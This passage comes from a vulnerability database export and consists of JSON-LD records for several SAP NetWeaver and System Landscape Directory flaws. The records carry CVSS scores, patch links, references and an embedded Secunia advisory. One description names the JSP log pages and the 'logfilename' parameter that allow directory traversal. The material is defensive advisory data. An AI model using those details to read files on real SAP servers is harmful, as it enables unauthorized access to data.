},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "f7471c7c-1ed1-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-03664"
}
]
},
"last_update_date": "2023-12-18T12:51:56.851000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note 1939334",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"title": "SAP System Landscape Directory is not authorized to access vulnerable patches",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/46408"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-03664"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002807"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-002807"
},
{
"db": "NVD",
"id": "CVE-2014-4003"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.0,
"url": "http://seclists.org/fulldisclosure/2014/jun/37"
},
{
"trust": 1.6,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.6,
"url": "https://service.sap.com/sap/support/notes/1939334"
},
{
"trust": 1.0,
"url": "http://packetstormsecurity.com/files/126986/sap-sld-information-tampering.html"
},
{
"trust": 1.0,
"url": "http://secunia.com/advisories/58633"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/archive/1/532331/100/0/threaded"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/bid/67923"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4003"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-4003"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.1,
"url": "https://www.onapsis.com."
},
{
"trust": 0.1,
"url": "https://service.sap.com/sap/support/notes/1939334."
},
{
"trust": 0.1,
"url": "http://www.dinclinx.com/redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1"
},
{
"trust": 0.1,
"url": "http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-020"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-03664"
},
{
"db": "BID",
"id": "67923"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002807"
},
{
"db": "PACKETSTORM",
"id": "126986"
},
{
"db": "NVD",
"id": "CVE-2014-4003"
},
{
"db": "CNNVD",
"id": "CNNVD-201406-118"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "f7471c7c-1ed1-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-03664"
},
{
"db": "BID",
"id": "67923"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002807"
},
{
"db": "PACKETSTORM",
"id": "126986"
},
{
"db": "NVD",
"id": "CVE-2014-4003"
},
{
"db": "CNNVD",
"id": "CNNVD-201406-118"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-06-17T00:00:00",
"db": "IVD",
"id": "f7471c7c-1ed1-11e6-abef-000c29c66e3d"
},
{
"date": "2014-06-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-03664"
},
{
"date": "2014-06-06T00:00:00",
"db": "BID",
"id": "67923"
},
{
"date": "2014-06-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-002807"
},
{
"date": "2014-06-06T23:56:58",
"db": "PACKETSTORM",
"id": "126986"
},
{
"date": "2014-06-09T20:55:08.497000",
"db": "NVD",
"id": "CVE-2014-4003"
},
{
"date": "2014-06-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201406-118"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-06-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-03664"
},
{
"date": "2014-06-11T00:02:00",
"db": "BID",
"id": "67923"
},
{
"date": "2014-06-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-002807"
},
{
"date": "2018-10-09T19:47:33.220000",
"db": "NVD",
"id": "CVE-2014-4003"
},
{
"date": "2014-06-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201406-118"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "126986"
},
{
"db": "CNNVD",
"id": "CNNVD-201406-118"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP System Landscape Directory Unauthorized Access Vulnerability",
"sources": [
{
"db": "IVD",
"id": "f7471c7c-1ed1-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-03664"
},
{
"db": "BID",
"id": "67923"
}
],
"trust": 1.1
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201406-118"
}
],
"trust": 0.6
}
}
var-201302-0421
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The SAP Enterprise Portal Federation configuration page does not properly handle validation, allowing for the disclosure of entire Portal schema information
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201302-0421",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.x"
},
{
"model": "enterprise portal",
"scope": null,
"trust": 0.6,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.x*"
},
{
"model": "enterprise portal null",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "*"
}
],
"sources": [
{
"db": "IVD",
"id": "055b1f9a-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01358"
}
]
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "055b1f9a-1f34-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "055b1f9a-1f34-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "055b1f9a-1f34-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The SAP Enterprise Portal Federation configuration page does not properly handle validation, allowing for the disclosure of entire Portal schema information",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-01358"
},
{
"db": "IVD",
"id": "055b1f9a-1f34-11e6-abef-000c29c66e3d"
}
],
"trust": 0.72
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-01358",
"trust": 0.8
},
{
"db": "IVD",
"id": "055B1F9A-1F34-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "055b1f9a-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01358"
}
]
},
"id": "VAR-201302-0421",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "055b1f9a-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01358"
}
],
"trust": 1.07095325
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "055b1f9a-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01358"
}
]
},
"last_update_date": "2022-05-17T01:51:13.079000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for SAP Portal PDC Information Disclosure Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/32381"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-01358"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-02/0130.html"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-01358"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "055b1f9a-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01358"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-02-28T00:00:00",
"db": "IVD",
"id": "055b1f9a-1f34-11e6-abef-000c29c66e3d"
},
{
"date": "2013-02-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-01358"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-05-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-01358"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Portal PDC Information Disclosure Vulnerability",
"sources": [
{
"db": "IVD",
"id": "055b1f9a-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01358"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Information leakage",
"sources": [
{
"db": "IVD",
"id": "055b1f9a-1f34-11e6-abef-000c29c66e3d"
}
],
"trust": 0.2
}
}
var-201202-0345
Vulnerability from variot
Multiple directory traversal vulnerabilities in SAP NetWeaver 7.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the logfilename parameter to (1) b2b/admin/log.jsp or (2) b2b/admin/log_view.jsp in the Internet Sales (crm.b2b) component, or (3) ipc/admin/log.jsp or (4) ipc/admin/log_view.jsp in the Application Administration (com.sap.ipc.webapp.ipc) component. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There is a vulnerability in SAP NetWeaver. Because the input passed to the b2b/admin/log_view.jsp or b2b/admin/log.jsp script in the Internet Sales module via the \"logfilename\" parameter is missing validation before being used to display the file, it can result in arbitrary files being obtained through the directory traversal sequence. information. The SAP NetWeaver com.sap.aii.mdt.amt.web.AMTPageProcessor servlet error can be exploited to leak certain Adapter monitoring information. SAP NetWeaver is prone to multiple input-validation vulnerabilities, including: 1. A cross-site scripting vulnerability 2. Multiple information-disclosure vulnerabilities Attackers can exploit these issues to execute arbitrary script code in the context of the website, steal cookie-based authentication information, and disclose sensitive information. Other attacks are also possible. ----------------------------------------------------------------------
Secunia presentations @ RSA Conference 2012, San Francisco, USA, 27 Feb-02 March Listen to our Chief Security Specialist, Research Analyst Director, and Director Product Management & Quality Assurance discuss the industry's key topics. Also, visit the Secunia stand #817. Find out more: http://www.rsaconference.com/events/2012/usa/index.htm
TITLE: SAP NetWeaver Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA47861
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/47861/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=47861
RELEASE DATE: 2012-02-21
DISCUSS ADVISORY: http://secunia.com/advisories/47861/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/47861/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=47861
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Digital Security Research Group has reported some vulnerabilities in SAP NetWeaver, which can be exploited by malicious people to conduct cross-site scripting attacks and by malicious users and malicious people to disclose sensitive information.
Successful exploitation of vulnerabilities #1 and #2 may require permission to view logs.
The vulnerabilities are reported in version 7.0. Other versions may also be affected.
SOLUTION: Apply SAP Security Notes 1585527 and 1583300.
PROVIDED AND/OR DISCOVERED BY: Dmitriy Chastukhin, Digital Security Research Group.
ORIGINAL ADVISORY: Digital Security Research Group: http://dsecrg.com/pages/vul/show.php?id=412 http://dsecrg.com/pages/vul/show.php?id=413 http://dsecrg.com/pages/vul/show.php?id=414 http://dsecrg.com/pages/vul/show.php?id=415 http://dsecrg.com/pages/vul/show.php?id=416
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201202-0345",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 6.7,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "IVD",
"id": "57b1159e-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "360fbe54-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "55f9093c-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "1f68ba5c-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "5a3e0c36-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"db": "BID",
"id": "52101"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001569"
},
{
"db": "NVD",
"id": "CVE-2012-1289"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-431"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2012-1289"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitriy Chastukhin of Digital Security Research Group.",
"sources": [
{
"db": "BID",
"id": "52101"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-431"
}
],
"trust": 0.9
},
"cve": "CVE-2012-1289",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2012-1289",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "57b1159e-1f73-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "360fbe54-1f73-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "55f9093c-1f73-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "1f68ba5c-1f73-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "5a3e0c36-1f73-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.9 [IVD]"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2012-1289",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201202-431",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "57b1159e-1f73-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "360fbe54-1f73-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "55f9093c-1f73-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "1f68ba5c-1f73-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "5a3e0c36-1f73-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "57b1159e-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "360fbe54-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "55f9093c-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "1f68ba5c-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "5a3e0c36-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001569"
},
{
"db": "NVD",
"id": "CVE-2012-1289"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-431"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
